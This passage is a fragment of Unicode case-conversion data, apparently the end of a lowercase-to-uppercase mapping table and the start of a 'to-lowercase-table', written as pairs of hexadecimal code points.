022Ch 022Fh 022Eh 0231h 0230h 0233h 0232h 023Ch 023Bh 023Fh 2C7Eh 0240h 2C7Fh 0242h 0241h 0247h 0246h 0249h 0248h 024Bh 024Ah 024Dh 024Ch 024Fh 024Eh 0250h 2C6Fh 0251h 2C6Dh 0252h 2C70h 0253h 0181h 0254h 0186h 0256h 0189h 0257h 018Ah 0259h 018Fh 025Bh 0190h 025Ch A7ABh 0260h 0193h 0261h A7ACh 0263h 0194h 0265h A78Dh 0266h A7AAh 0268h 0197h 0269h 0196h 026Ah A7AEh 026Bh 2C62h 026Ch A7ADh 026Fh 019Ch 0271h 2C6Eh 0272h 019Dh 0275h 019Fh 027Dh 2C64h 0280h 01A6h 0283h 01A9h 0287h A7B1h 0288h 01AEh 0289h 0244h 028Ah 01B1h 028Bh 01B2h 028Ch 0245h 0292h 01B7h 029Dh A7B2h 029Eh A7B0h 0345h 0399h 0371h 0370h 0373h 0372h 0377h 0376h 037Bh 03FDh 037Ch 03FEh 037Dh 03FFh 0390h 0399h 03ACh 0386h 03ADh 0388h 03AEh 0389h 03AFh 038Ah 03B0h 03A5h 03B1h 0391h 03B2h 0392h 03B3h 0393h 03B4h 0394h 03B5h 0395h 03B6h 0396h 03B7h 0397h 03B8h 0398h 03B9h 0399h 03BAh 039Ah 03BBh 039Bh 03BCh 039Ch 03BDh 039Dh 03BEh 039Eh 03BFh 039Fh 03C0h 03A0h 03C1h 03A1h 03C2h 03A3h 03C3h 03A3h 03C4h 03A4h 03C5h 03A5h 03C6h 03A6h 03C7h 03A7h 03C8h 03A8h 03C9h 03A9h 03CAh 03AAh 03CBh 03ABh 03CCh 038Ch 03CDh 038Eh 03CEh 038Fh 03D0h 0392h 03D1h 0398h 03D5h 03A6h 03D6h 03A0h 03D7h 03CFh 03D9h 03D8h 03DBh 03DAh 03DDh 03DCh 03DFh 03DEh 03E1h 03E0h 03E3h 03E2h 03E5h 03E4h 03E7h 03E6h 03E9h 03E8h 03EBh 03EAh 03EDh 03ECh 03EFh 03EEh 03F0h 039Ah 03F1h 03A1h 03F2h 03F9h 03F3h 037Fh 03F5h 0395h 03F8h 03F7h 03FBh 03FAh 0430h 0410h 0431h 0411h 0432h 0412h 0433h 0413h 0434h 0414h 0435h 0415h 0436h 0416h 0437h 0417h 0438h 0418h 0439h 0419h 043Ah 041Ah 043Bh 041Bh 043Ch 041Ch 043Dh 041Dh 043Eh 041Eh 043Fh 041Fh 0440h 0420h 0441h 0421h 0442h 0422h 0443h 0423h 0444h 0424h 0445h 0425h 0446h 0426h 0447h 0427h 0448h 0428h 0449h 0429h 044Ah 042Ah 044Bh 042Bh 044Ch 042Ch 044Dh 042Dh 044Eh 042Eh 044Fh 042Fh 0450h 0400h 0451h 0401h 0452h 0402h 0453h 0403h 0454h 0404h 0455h 0405h 0456h 0406h 0457h 0407h 0458h 0408h 0459h 0409h 045Ah 040Ah 045Bh 040Bh 045Ch 040Ch 045Dh 040Dh 045Eh 040Eh 045Fh 040Fh 0461h 0460h 0463h 0462h 0465h 0464h 0467h 0466h 0469h 0468h 046Bh 046Ah 046Dh 046Ch 046Fh 046Eh 0471h 0470h 0473h 0472h 0475h 0474h 0477h 0476h 0479h 0478h 047Bh 047Ah 047Dh 047Ch 047Fh 047Eh 0481h 0480h 048Bh 048Ah 048Dh 048Ch 048Fh 048Eh 0491h 0490h 0493h 0492h 0495h 0494h 0497h 0496h 0499h 0498h 049Bh 049Ah 049Dh 049Ch 049Fh 049Eh 04A1h 04A0h 04A3h 04A2h 04A5h 04A4h 04A7h 04A6h 04A9h 04A8h 04ABh 04AAh 04ADh 04ACh 04AFh 04AEh 04B1h 04B0h 04B3h 04B2h 04B5h 04B4h 04B7h 04B6h 04B9h 04B8h 04BBh 04BAh 04BDh 04BCh 04BFh 04BEh 04C2h 04C1h 04C4h 04C3h 04C6h 04C5h 04C8h 04C7h 04CAh 04C9h 04CCh 04CBh 04CEh 04CDh 04CFh 04C0h 04D1h 04D0h 04D3h 04D2h 04D5h 04D4h 04D7h 04D6h 04D9h 04D8h 04DBh 04DAh 04DDh 04DCh 04DFh 04DEh 04E1h 04E0h 04E3h 04E2h 04E5h 04E4h 04E7h 04E6h 04E9h 04E8h 04EBh 04EAh 04EDh 04ECh 04EFh 04EEh 04F1h 04F0h 04F3h 04F2h 04F5h 04F4h 04F7h 04F6h 04F9h 04F8h 04FBh 04FAh 04FDh 04FCh 04FFh 04FEh 0501h 0500h 0503h 0502h 0505h 0504h 0507h 0506h 0509h 0508h 050Bh 050Ah 050Dh 050Ch 050Fh 050Eh 0511h 0510h 0513h 0512h 0515h 0514h 0517h 0516h 0519h 0518h 051Bh 051Ah 051Dh 051Ch 051Fh 051Eh 0521h 0520h 0523h 0522h 0525h 0524h 0527h 0526h 0529h 0528h 052Bh 052Ah 052Dh 052Ch 052Fh 052Eh 0561h 0531h 0562h 0532h 0563h 0533h 0564h 0534h 0565h 0535h 0566h 0536h 0567h 0537h 0568h 0538h 0569h 0539h 056Ah 053Ah 056Bh 053Bh 056Ch 053Ch 056Dh 053Dh 056Eh 053Eh 056Fh 053Fh 0570h 0540h 0571h 0541h 0572h 0542h 0573h 0543h 0574h 0544h 0575h 0545h 0576h 0546h 0577h 0547h 0578h 0548h 0579h 0549h 057Ah 054Ah 057Bh 054Bh 057Ch 054Ch 057Dh 054Dh 057Eh 054Eh 057Fh 054Fh 0580h 0550h 0581h 0551h 0582h 0552h 0583h 0553h 0584h 0554h 0585h 0555h 0586h 0556h 0587h 0535h 10D0h 1C90h 10D1h 1C91h 10D2h 1C92h 10D3h 1C93h 10D4h 1C94h 10D5h 1C95h 10D6h 1C96h 10D7h 1C97h 10D8h 1C98h 10D9h 1C99h 10DAh 1C9Ah 10DBh 1C9Bh 10DCh 1C9Ch 10DDh 1C9Dh 10DEh 1C9Eh 10DFh 1C9Fh 10E0h 1CA0h 10E1h 1CA1h 10E2h 1CA2h 10E3h 1CA3h 10E4h 1CA4h 10E5h 1CA5h 10E6h 1CA6h 10E7h 1CA7h 10E8h 1CA8h 10E9h 1CA9h 10EAh 1CAAh 10EBh 1CABh 10ECh 1CACh 10EDh 1CADh 10EEh 1CAEh 10EFh 1CAFh 10F0h 1CB0h 10F1h 1CB1h 10F2h 1CB2h 10F3h 1CB3h 10F4h 1CB4h 10F5h 1CB5h 10F6h 1CB6h 10F7h 1CB7h 10F8h 1CB8h 10F9h 1CB9h 10FAh 1CBAh 10FDh 1CBDh 10FEh 1CBEh 10FFh 1CBFh 13F8h 13F0h 13F9h 13F1h 13FAh 13F2h 13FBh 13F3h 13FCh 13F4h 13FDh 13F5h 1C80h 0412h 1C81h 0414h 1C82h 041Eh 1C83h 0421h 1C84h 0422h 1C85h 0422h 1C86h 042Ah 1C87h 0462h 1C88h A64Ah 1D79h A77Dh 1D7Dh 2C63h 1E01h 1E00h 1E03h 1E02h 1E05h 1E04h 1E07h 1E06h 1E09h 1E08h 1E0Bh 1E0Ah 1E0Dh 1E0Ch 1E0Fh 1E0Eh 1E11h 1E10h 1E13h 1E12h 1E15h 1E14h 1E17h 1E16h 1E19h 1E18h 1E1Bh 1E1Ah 1E1Dh 1E1Ch 1E1Fh 1E1Eh 1E21h 1E20h 1E23h 1E22h 1E25h 1E24h 1E27h 1E26h 1E29h 1E28h 1E2Bh 1E2Ah 1E2Dh 1E2Ch 1E2Fh 1E2Eh 1E31h 1E30h 1E33h 1E32h 1E35h 1E34h 1E37h 1E36h 1E39h 1E38h 1E3Bh 1E3Ah 1E3Dh 1E3Ch 1E3Fh 1E3Eh 1E41h 1E40h 1E43h 1E42h 1E45h 1E44h 1E47h 1E46h 1E49h 1E48h 1E4Bh 1E4Ah 1E4Dh 1E4Ch 1E4Fh 1E4Eh 1E51h 1E50h 1E53h 1E52h 1E55h 1E54h 1E57h 1E56h 1E59h 1E58h 1E5Bh 1E5Ah 1E5Dh 1E5Ch 1E5Fh 1E5Eh 1E61h 1E60h 1E63h 1E62h 1E65h 1E64h 1E67h 1E66h 1E69h 1E68h 1E6Bh 1E6Ah 1E6Dh 1E6Ch 1E6Fh 1E6Eh 1E71h 1E70h 1E73h 1E72h 1E75h 1E74h 1E77h 1E76h 1E79h 1E78h 1E7Bh 1E7Ah 1E7Dh 1E7Ch 1E7Fh 1E7Eh 1E81h 1E80h 1E83h 1E82h 1E85h 1E84h 1E87h 1E86h 1E89h 1E88h 1E8Bh 1E8Ah 1E8Dh 1E8Ch 1E8Fh 1E8Eh 1E91h 1E90h 1E93h 1E92h 1E95h 1E94h 1E96h 0048h 1E97h 0054h 1E98h 0057h 1E99h 0059h 1E9Ah 0041h 1E9Bh 1E60h 1EA1h 1EA0h 1EA3h 1EA2h 1EA5h 1EA4h 1EA7h 1EA6h 1EA9h 1EA8h 1EABh 1EAAh 1EADh 1EACh 1EAFh 1EAEh 1EB1h 1EB0h 1EB3h 1EB2h 1EB5h 1EB4h 1EB7h 1EB6h 1EB9h 1EB8h 1EBBh 1EBAh 1EBDh 1EBCh 1EBFh 1EBEh 1EC1h 1EC0h 1EC3h 1EC2h 1EC5h 1EC4h 1EC7h 1EC6h 1EC9h 1EC8h 1ECBh 1ECAh 1ECDh 1ECCh 1ECFh 1ECEh 1ED1h 1ED0h 1ED3h 1ED2h 1ED5h 1ED4h 1ED7h 1ED6h 1ED9h 1ED8h 1EDBh 1EDAh 1EDDh 1EDCh 1EDFh 1EDEh 1EE1h 1EE0h 1EE3h 1EE2h 1EE5h 1EE4h 1EE7h 1EE6h 1EE9h 1EE8h 1EEBh 1EEAh 1EEDh 1EECh 1EEFh 1EEEh 1EF1h 1EF0h 1EF3h 1EF2h 1EF5h 1EF4h 1EF7h 1EF6h 1EF9h 1EF8h 1EFBh 1EFAh 1EFDh 1EFCh 1EFFh 1EFEh 1F00h 1F08h 1F01h 1F09h 1F02h 1F0Ah 1F03h 1F0Bh 1F04h 1F0Ch 1F05h 1F0Dh 1F06h 1F0Eh 1F07h 1F0Fh 1F10h 1F18h 1F11h 1F19h 1F12h 1F1Ah 1F13h 1F1Bh 1F14h 1F1Ch 1F15h 1F1Dh 1F20h 1F28h 1F21h 1F29h 1F22h 1F2Ah 1F23h 1F2Bh 1F24h 1F2Ch 1F25h 1F2Dh 1F26h 1F2Eh 1F27h 1F2Fh 1F30h 1F38h 1F31h 1F39h 1F32h 1F3Ah 1F33h 1F3Bh 1F34h 1F3Ch 1F35h 1F3Dh 1F36h 1F3Eh 1F37h 1F3Fh 1F40h 1F48h 1F41h 1F49h 1F42h 1F4Ah 1F43h 1F4Bh 1F44h 1F4Ch 1F45h 1F4Dh 1F50h 03A5h 1F51h 1F59h 1F52h 03A5h 1F53h 1F5Bh 1F54h 03A5h 1F55h 1F5Dh 1F56h 03A5h 1F57h 1F5Fh 1F60h 1F68h 1F61h 1F69h 1F62h 1F6Ah 1F63h 1F6Bh 1F64h 1F6Ch 1F65h 1F6Dh 1F66h 1F6Eh 1F67h 1F6Fh 1F70h 1FBAh 1F71h 1FBBh 1F72h 1FC8h 1F73h 1FC9h 1F74h 1FCAh 1F75h 1FCBh 1F76h 1FDAh 1F77h 1FDBh 1F78h 1FF8h 1F79h 1FF9h 1F7Ah 1FEAh 1F7Bh 1FEBh 1F7Ch 1FFAh 1F7Dh 1FFBh 1F80h 1F08h 1F81h 1F09h 1F82h 1F0Ah 1F83h 1F0Bh 1F84h 1F0Ch 1F85h 1F0Dh 1F86h 1F0Eh 1F87h 1F0Fh 1F88h 1F08h 1F89h 1F09h 1F8Ah 1F0Ah 1F8Bh 1F0Bh 1F8Ch 1F0Ch 1F8Dh 1F0Dh 1F8Eh 1F0Eh 1F8Fh 1F0Fh 1F90h 1F28h 1F91h 1F29h 1F92h 1F2Ah 1F93h 1F2Bh 1F94h 1F2Ch 1F95h 1F2Dh 1F96h 1F2Eh 1F97h 1F2Fh 1F98h 1F28h 1F99h 1F29h 1F9Ah 1F2Ah 1F9Bh 1F2Bh 1F9Ch 1F2Ch 1F9Dh 1F2Dh 1F9Eh 1F2Eh 1F9Fh 1F2Fh 1FA0h 1F68h 1FA1h 1F69h 1FA2h 1F6Ah 1FA3h 1F6Bh 1FA4h 1F6Ch 1FA5h 1F6Dh 1FA6h 1F6Eh 1FA7h 1F6Fh 1FA8h 1F68h 1FA9h 1F69h 1FAAh 1F6Ah 1FABh 1F6Bh 1FACh 1F6Ch 1FADh 1F6Dh 1FAEh 1F6Eh 1FAFh 1F6Fh 1FB0h 1FB8h 1FB1h 1FB9h 1FB2h 1FBAh 1FB3h 0391h 1FB4h 0386h 1FB6h 0391h 1FB7h 0391h 1FBCh 0391h 1FBEh 0399h 1FC2h 1FCAh 1FC3h 0397h 1FC4h 0389h 1FC6h 0397h 1FC7h 0397h 1FCCh 0397h 1FD0h 1FD8h 1FD1h 1FD9h 1FD2h 0399h 1FD3h 0399h 1FD6h 0399h 1FD7h 0399h 1FE0h 1FE8h 1FE1h 1FE9h 1FE2h 03A5h 1FE3h 03A5h 1FE4h 03A1h 1FE5h 1FECh 1FE6h 03A5h 1FE7h 03A5h 1FF2h 1FFAh 1FF3h 03A9h 1FF4h 038Fh 1FF6h 03A9h 1FF7h 03A9h 1FFCh 03A9h 214Eh 2132h 2170h 2160h 2171h 2161h 2172h 2162h 2173h 2163h 2174h 2164h 2175h 2165h 2176h 2166h 2177h 2167h 2178h 2168h 2179h 2169h 217Ah 216Ah 217Bh 216Bh 217Ch 216Ch 217Dh 216Dh 217Eh 216Eh 217Fh 216Fh 2184h 2183h 24D0h 24B6h 24D1h 24B7h 24D2h 24B8h 24D3h 24B9h 24D4h 24BAh 24D5h 24BBh 24D6h 24BCh 24D7h 24BDh 24D8h 24BEh 24D9h 24BFh 24DAh 24C0h 24DBh 24C1h 24DCh 24C2h 24DDh 24C3h 24DEh 24C4h 24DFh 24C5h 24E0h 24C6h 24E1h 24C7h 24E2h 24C8h 24E3h 24C9h 24E4h 24CAh 24E5h 24CBh 24E6h 24CCh 24E7h 24CDh 24E8h 24CEh 24E9h 24CFh 2C30h 2C00h 2C31h 2C01h 2C32h 2C02h 2C33h 2C03h 2C34h 2C04h 2C35h 2C05h 2C36h 2C06h 2C37h 2C07h 2C38h 2C08h 2C39h 2C09h 2C3Ah 2C0Ah 2C3Bh 2C0Bh 2C3Ch 2C0Ch 2C3Dh 2C0Dh 2C3Eh 2C0Eh 2C3Fh 2C0Fh 2C40h 2C10h 2C41h 2C11h 2C42h 2C12h 2C43h 2C13h 2C44h 2C14h 2C45h 2C15h 2C46h 2C16h 2C47h 2C17h 2C48h 2C18h 2C49h 2C19h 2C4Ah 2C1Ah 2C4Bh 2C1Bh 2C4Ch 2C1Ch 2C4Dh 2C1Dh 2C4Eh 2C1Eh 2C4Fh 2C1Fh 2C50h 2C20h 2C51h 2C21h 2C52h 2C22h 2C53h 2C23h 2C54h 2C24h 2C55h 2C25h 2C56h 2C26h 2C57h 2C27h 2C58h 2C28h 2C59h 2C29h 2C5Ah 2C2Ah 2C5Bh 2C2Bh 2C5Ch 2C2Ch 2C5Dh 2C2Dh 2C5Eh 2C2Eh 2C61h 2C60h 2C65h 023Ah 2C66h 023Eh 2C68h 2C67h 2C6Ah 2C69h 2C6Ch 2C6Bh 2C73h 2C72h 2C76h 2C75h 2C81h 2C80h 2C83h 2C82h 2C85h 2C84h 2C87h 2C86h 2C89h 2C88h 2C8Bh 2C8Ah 2C8Dh 2C8Ch 2C8Fh 2C8Eh 2C91h 2C90h 2C93h 2C92h 2C95h 2C94h 2C97h 2C96h 2C99h 2C98h 2C9Bh 2C9Ah 2C9Dh 2C9Ch 2C9Fh 2C9Eh 2CA1h 2CA0h 2CA3h 2CA2h 2CA5h 2CA4h 2CA7h 2CA6h 2CA9h 2CA8h 2CABh 2CAAh 2CADh 2CACh 2CAFh 2CAEh 2CB1h 2CB0h 2CB3h 2CB2h 2CB5h 2CB4h 2CB7h 2CB6h 2CB9h 2CB8h 2CBBh 2CBAh 2CBDh 2CBCh 2CBFh 2CBEh 2CC1h 2CC0h 2CC3h 2CC2h 2CC5h 2CC4h 2CC7h 2CC6h 2CC9h 2CC8h 2CCBh 2CCAh 2CCDh 2CCCh 2CCFh 2CCEh 2CD1h 2CD0h 2CD3h 2CD2h 2CD5h 2CD4h 2CD7h 2CD6h 2CD9h 2CD8h 2CDBh 2CDAh 2CDDh 2CDCh 2CDFh 2CDEh 2CE1h 2CE0h 2CE3h 2CE2h 2CECh 2CEBh 2CEEh 2CEDh 2CF3h 2CF2h 2D00h 10A0h 2D01h 10A1h 2D02h 10A2h 2D03h 10A3h 2D04h 10A4h 2D05h 10A5h 2D06h 10A6h 2D07h 10A7h 2D08h 10A8h 2D09h 10A9h 2D0Ah 10AAh 2D0Bh 10ABh 2D0Ch 10ACh 2D0Dh 10ADh 2D0Eh 10AEh 2D0Fh 10AFh 2D10h 10B0h 2D11h 10B1h 2D12h 10B2h 2D13h 10B3h 2D14h 10B4h 2D15h 10B5h 2D16h 10B6h 2D17h 10B7h 2D18h 10B8h 2D19h 10B9h 2D1Ah 10BAh 2D1Bh 10BBh 2D1Ch 10BCh 2D1Dh 10BDh 2D1Eh 10BEh 2D1Fh 10BFh 2D20h 10C0h 2D21h 10C1h 2D22h 10C2h 2D23h 10C3h 2D24h 10C4h 2D25h 10C5h 2D27h 10C7h 2D2Dh 10CDh A641h A640h A643h A642h A645h A644h A647h A646h A649h A648h A64Bh A64Ah A64Dh A64Ch A64Fh A64Eh A651h A650h A653h A652h A655h A654h A657h A656h A659h A658h A65Bh A65Ah A65Dh A65Ch A65Fh A65Eh A661h A660h A663h A662h A665h A664h A667h A666h A669h A668h A66Bh A66Ah A66Dh A66Ch A681h A680h A683h A682h A685h A684h A687h A686h A689h A688h A68Bh A68Ah A68Dh A68Ch A68Fh A68Eh A691h A690h A693h A692h A695h A694h A697h A696h A699h A698h A69Bh A69Ah A723h A722h A725h A724h A727h A726h A729h A728h A72Bh A72Ah A72Dh A72Ch A72Fh A72Eh A733h A732h A735h A734h A737h A736h A739h A738h A73Bh A73Ah A73Dh A73Ch A73Fh A73Eh A741h A740h A743h A742h A745h A744h A747h A746h A749h A748h A74Bh A74Ah A74Dh A74Ch A74Fh A74Eh A751h A750h A753h A752h A755h A754h A757h A756h A759h A758h A75Bh A75Ah A75Dh A75Ch A75Fh A75Eh A761h A760h A763h A762h A765h A764h A767h A766h A769h A768h A76Bh A76Ah A76Dh A76Ch A76Fh A76Eh A77Ah A779h A77Ch A77Bh A77Fh A77Eh A781h A780h A783h A782h A785h A784h A787h A786h A78Ch A78Bh A791h A790h A793h A792h A797h A796h A799h A798h A79Bh A79Ah A79Dh A79Ch A79Fh A79Eh A7A1h A7A0h A7A3h A7A2h A7A5h A7A4h A7A7h A7A6h A7A9h A7A8h A7B5h A7B4h A7B7h A7B6h A7B9h A7B8h AB53h A7B3h AB70h 13A0h AB71h 13A1h AB72h 13A2h AB73h 13A3h AB74h 13A4h AB75h 13A5h AB76h 13A6h AB77h 13A7h AB78h 13A8h AB79h 13A9h AB7Ah 13AAh AB7Bh 13ABh AB7Ch 13ACh AB7Dh 13ADh AB7Eh 13AEh AB7Fh 13AFh AB80h 13B0h AB81h 13B1h AB82h 13B2h AB83h 13B3h AB84h 13B4h AB85h 13B5h AB86h 13B6h AB87h 13B7h AB88h 13B8h AB89h 13B9h AB8Ah 13BAh AB8Bh 13BBh AB8Ch 13BCh AB8Dh 13BDh AB8Eh 13BEh AB8Fh 13BFh AB90h 13C0h AB91h 13C1h AB92h 13C2h AB93h 13C3h AB94h 13C4h AB95h 13C5h AB96h 13C6h AB97h 13C7h AB98h 13C8h AB99h 13C9h AB9Ah 13CAh AB9Bh 13CBh AB9Ch 13CCh AB9Dh 13CDh AB9Eh 13CEh AB9Fh 13CFh ABA0h 13D0h ABA1h 13D1h ABA2h 13D2h ABA3h 13D3h ABA4h 13D4h ABA5h 13D5h ABA6h 13D6h ABA7h 13D7h ABA8h 13D8h ABA9h 13D9h ABAAh 13DAh ABABh 13DBh ABACh 13DCh ABADh 13DDh ABAEh 13DEh ABAFh 13DFh ABB0h 13E0h ABB1h 13E1h ABB2h 13E2h ABB3h 13E3h ABB4h 13E4h ABB5h 13E5h ABB6h 13E6h ABB7h 13E7h ABB8h 13E8h ABB9h 13E9h ABBAh 13EAh ABBBh 13EBh ABBCh 13ECh ABBDh 13EDh ABBEh 13EEh ABBFh 13EFh FB00h 0046h FB01h 0046h FB02h 0046h FB03h 0046h FB04h 0046h FB05h 0053h FB06h 0053h FB13h 0544h FB14h 0544h FB15h 0544h FB16h 054Eh FB17h 0544h FF41h FF21h FF42h FF22h FF43h FF23h FF44h FF24h FF45h FF25h FF46h FF26h FF47h FF27h FF48h FF28h FF49h FF29h FF4Ah FF2Ah FF4Bh FF2Bh FF4Ch FF2Ch FF4Dh FF2Dh FF4Eh FF2Eh FF4Fh FF2Fh FF50h FF30h FF51h FF31h FF52h FF32h FF53h FF33h FF54h FF34h FF55h FF35h FF56h FF36h FF57h FF37h FF58h FF38h FF59h FF39h FF5Ah FF3Ah 00010428h 00010400h 00010429h 00010401h 0001042Ah 00010402h 0001042Bh 00010403h 0001042Ch 00010404h 0001042Dh 00010405h 0001042Eh 00010406h 0001042Fh 00010407h 00010430h 00010408h 00010431h 00010409h 00010432h 0001040Ah 00010433h 0001040Bh 00010434h 0001040Ch 00010435h 0001040Dh 00010436h 0001040Eh 00010437h 0001040Fh 00010438h 00010410h 00010439h 00010411h 0001043Ah 00010412h 0001043Bh 00010413h 0001043Ch 00010414h 0001043Dh 00010415h 0001043Eh 00010416h 0001043Fh 00010417h 00010440h 00010418h 00010441h 00010419h 00010442h 0001041Ah 00010443h 0001041Bh 00010444h 0001041Ch 00010445h 0001041Dh 00010446h 0001041Eh 00010447h 0001041Fh 00010448h 00010420h 00010449h 00010421h 0001044Ah 00010422h 0001044Bh 00010423h 0001044Ch 00010424h 0001044Dh 00010425h 0001044Eh 00010426h 0001044Fh 00010427h 000104D8h 000104B0h 000104D9h 000104B1h 000104DAh 000104B2h 000104DBh 000104B3h 000104DCh 000104B4h 000104DDh 000104B5h 000104DEh 000104B6h 000104DFh 000104B7h 000104E0h 000104B8h 000104E1h 000104B9h 000104E2h 000104BAh 000104E3h 000104BBh 000104E4h 000104BCh 000104E5h 000104BDh 000104E6h 000104BEh 000104E7h 000104BFh 000104E8h 000104C0h 000104E9h 000104C1h 000104EAh 000104C2h 000104EBh 000104C3h 000104ECh 000104C4h 000104EDh 000104C5h 000104EEh 000104C6h 000104EFh 000104C7h 000104F0h 000104C8h 000104F1h 000104C9h 000104F2h 000104CAh 000104F3h 000104CBh 000104F4h 000104CCh 000104F5h 000104CDh 000104F6h 000104CEh 000104F7h 000104CFh 000104F8h 000104D0h 000104F9h 000104D1h 000104FAh 000104D2h 000104FBh 000104D3h 00010CC0h 00010C80h 00010CC1h 00010C81h 00010CC2h 00010C82h 00010CC3h 00010C83h 00010CC4h 00010C84h 00010CC5h 00010C85h 00010CC6h 00010C86h 00010CC7h 00010C87h 00010CC8h 00010C88h 00010CC9h 00010C89h 00010CCAh 00010C8Ah 00010CCBh 00010C8Bh 00010CCCh 00010C8Ch 00010CCDh 00010C8Dh 00010CCEh 00010C8Eh 00010CCFh 00010C8Fh 00010CD0h 00010C90h 00010CD1h 00010C91h 00010CD2h 00010C92h 00010CD3h 00010C93h 00010CD4h 00010C94h 00010CD5h 00010C95h 00010CD6h 00010C96h 00010CD7h 00010C97h 00010CD8h 00010C98h 00010CD9h 00010C99h 00010CDAh 00010C9Ah 00010CDBh 00010C9Bh 00010CDCh 00010C9Ch 00010CDDh 00010C9Dh 00010CDEh 00010C9Eh 00010CDFh 00010C9Fh 00010CE0h 00010CA0h 00010CE1h 00010CA1h 00010CE2h 00010CA2h 00010CE3h 00010CA3h 00010CE4h 00010CA4h 00010CE5h 00010CA5h 00010CE6h 00010CA6h 00010CE7h 00010CA7h 00010CE8h 00010CA8h 00010CE9h 00010CA9h 00010CEAh 00010CAAh 00010CEBh 00010CABh 00010CECh 00010CACh 00010CEDh 00010CADh 00010CEEh 00010CAEh 00010CEFh 00010CAFh 00010CF0h 00010CB0h 00010CF1h 00010CB1h 00010CF2h 00010CB2h 000118C0h 000118A0h 000118C1h 000118A1h 000118C2h 000118A2h 000118C3h 000118A3h 000118C4h 000118A4h 000118C5h 000118A5h 000118C6h 000118A6h 000118C7h 000118A7h 000118C8h 000118A8h 000118C9h 000118A9h 000118CAh 000118AAh 000118CBh 000118ABh 000118CCh 000118ACh 000118CDh 000118ADh 000118CEh 000118AEh 000118CFh 000118AFh 000118D0h 000118B0h 000118D1h 000118B1h 000118D2h 000118B2h 000118D3h 000118B3h 000118D4h 000118B4h 000118D5h 000118B5h 000118D6h 000118B6h 000118D7h 000118B7h 000118D8h 000118B8h 000118D9h 000118B9h 000118DAh 000118BAh 000118DBh 000118BBh 000118DCh 000118BCh 000118DDh 000118BDh 000118DEh 000118BEh 000118DFh 000118BFh 00016E60h 00016E40h 00016E61h 00016E41h 00016E62h 00016E42h 00016E63h 00016E43h 00016E64h 00016E44h 00016E65h 00016E45h 00016E66h 00016E46h 00016E67h 00016E47h 00016E68h 00016E48h 00016E69h 00016E49h 00016E6Ah 00016E4Ah 00016E6Bh 00016E4Bh 00016E6Ch 00016E4Ch 00016E6Dh 00016E4Dh 00016E6Eh 00016E4Eh 00016E6Fh 00016E4Fh 00016E70h 00016E50h 00016E71h 00016E51h 00016E72h 00016E52h 00016E73h 00016E53h 00016E74h 00016E54h 00016E75h 00016E55h 00016E76h 00016E56h 00016E77h 00016E57h 00016E78h 00016E58h 00016E79h 00016E59h 00016E7Ah 00016E5Ah 00016E7Bh 00016E5Bh 00016E7Ch 00016E5Ch 00016E7Dh 00016E5Dh 00016E7Eh 00016E5Eh 00016E7Fh 00016E5Fh 0001E922h 0001E900h 0001E923h 0001E901h 0001E924h 0001E902h 0001E925h 0001E903h 0001E926h 0001E904h 0001E927h 0001E905h 0001E928h 0001E906h 0001E929h 0001E907h 0001E92Ah 0001E908h 0001E92Bh 0001E909h 0001E92Ch 0001E90Ah 0001E92Dh 0001E90Bh 0001E92Eh 0001E90Ch 0001E92Fh 0001E90Dh 0001E930h 0001E90Eh 0001E931h 0001E90Fh 0001E932h 0001E910h 0001E933h 0001E911h 0001E934h 0001E912h 0001E935h 0001E913h 0001E936h 0001E914h 0001E937h 0001E915h 0001E938h 0001E916h 0001E939h 0001E917h 0001E93Ah 0001E918h 0001E93Bh 0001E919h 0001E93Ch 0001E91Ah 0001E93Dh 0001E91Bh 0001E93Eh 0001E91Ch 0001E93Fh 0001E91Dh 0001E940h 0001E91Eh 0001E941h 0001E91Fh 0001E942h 0001E920h 0001E943h 0001E921h ] to-lowercase-table: [ 0041h 0061h 0042h 0062h 0043h 0063h 0044h 0064h 0045h 0065h 0046h 0066h 0047h 0067h 0048h 0068h 0049h 0069h 004Ah 006Ah 004Bh 006Bh 004Ch 006Ch 004Dh 006Dh 004Eh 006Eh 004Fh 006Fh 0050h 0070h 0051h 0071h 0052h 0072h 0053h 0073h 0054h 0074h 0055h 0075h 0056h 0076h 0057h 0077h 0058h 0078h 0059h 0079h 005Ah 007Ah 00C0h 00E0h 00C1h 00E1h 00C2h 00E2h 00C3h 00E3h 00C4h 00E4h 00C5h 00E5h 00C6h 00E6h 00C7h 00E7h 00C8h 00E8h 00C9h 00E9h 00CAh 00EAh 00CBh 00EBh 00CCh 00ECh 00CDh 00EDh 00CEh 00EEh 00CFh 00EFh 00D0h 00F0h 00D1h 00F1h 00D2h 00F2h 00D3h 00F3h 00D4h 00F4h 00D5h 00F5h 00D6h 00F6h 00D8h 00F8h 00D9h 00F9h 00DAh 00FAh 00DBh 00FBh 00DCh 00FCh 00DDh 00FDh 00DEh 00FEh 0100h 0101h 0102h 0103h 0104h 0105h 0106h 0107h 0108h 0109h 010Ah 010Bh 010Ch 010Dh 010Eh 010Fh 0110h 0111h 0112h 0113h 0114h 0115h 0116h 0117h 0118h 0119h 011Ah 011Bh 011Ch 011Dh 011Eh 011Fh 0120h 0121h 0122h 0123h 0124h 0125h 0126h 0127h 0128h 0129h 012Ah 012Bh 012Ch 012Dh 012Eh 012Fh 0130h 0069h 0132h 0133h 0134h 0135h 0136h 0137h 0139h 013Ah 013Bh 013Ch 013Dh 013Eh 013Fh 0140h 0141h 0142h 0143h 0144h 0145h 0146h 0147h 0148h 014Ah 014Bh 014Ch 014Dh 014Eh 014Fh 0150h 0151h 0152h 0153h 0154h 0155h 0156h 0157h 0158h 0159h 015Ah 015Bh 015Ch 015Dh 015Eh 015Fh 0160h 0161h 0162h 0163h 0164h 0165h 0166h 0167h 0168h 0169h 016Ah 016Bh 016Ch 016Dh 016Eh 016Fh 0170h 0171h 0172h 0173h 0174h 0175h 0176h 0177h 0178h 00FFh 0179h 017Ah 017Bh 017Ch 017Dh 017Eh 0181h 0253h 0182h 0183h 0184h 0185h 0186h 0254h 0187h 0188h 0189h 0256h 018Ah 0257h 018Bh 018Ch 018Eh 01DDh 018Fh 0259h 0190h 025Bh 0191h 0192h 0193h 0260h 0194h 0263h 0196h 0269h 0197h 0268h 0198h 0199h 019Ch 026Fh 019Dh 0272h 019Fh 0275h 01A0h 01A1h 01A2h 01A3h 01A4h 01A5h 01A6h 0280h 01A7h 01A8h 01A9h 0283h 01ACh 01ADh 01AEh 0288h 01AFh 01B0h 01B1h 028Ah 01B2h 028Bh 01B3h 01B4h 01B5h 01B6h 01B7h 0292h 01B8h 01B9h 01BCh 01BDh 01C4h 01C6h 01C5h 01C6h 01C7h 01C9h 01C8h 01C9h 01CAh 01CCh 01CBh 01CCh 01CDh 01CEh 01CFh 01D0h 01D1h 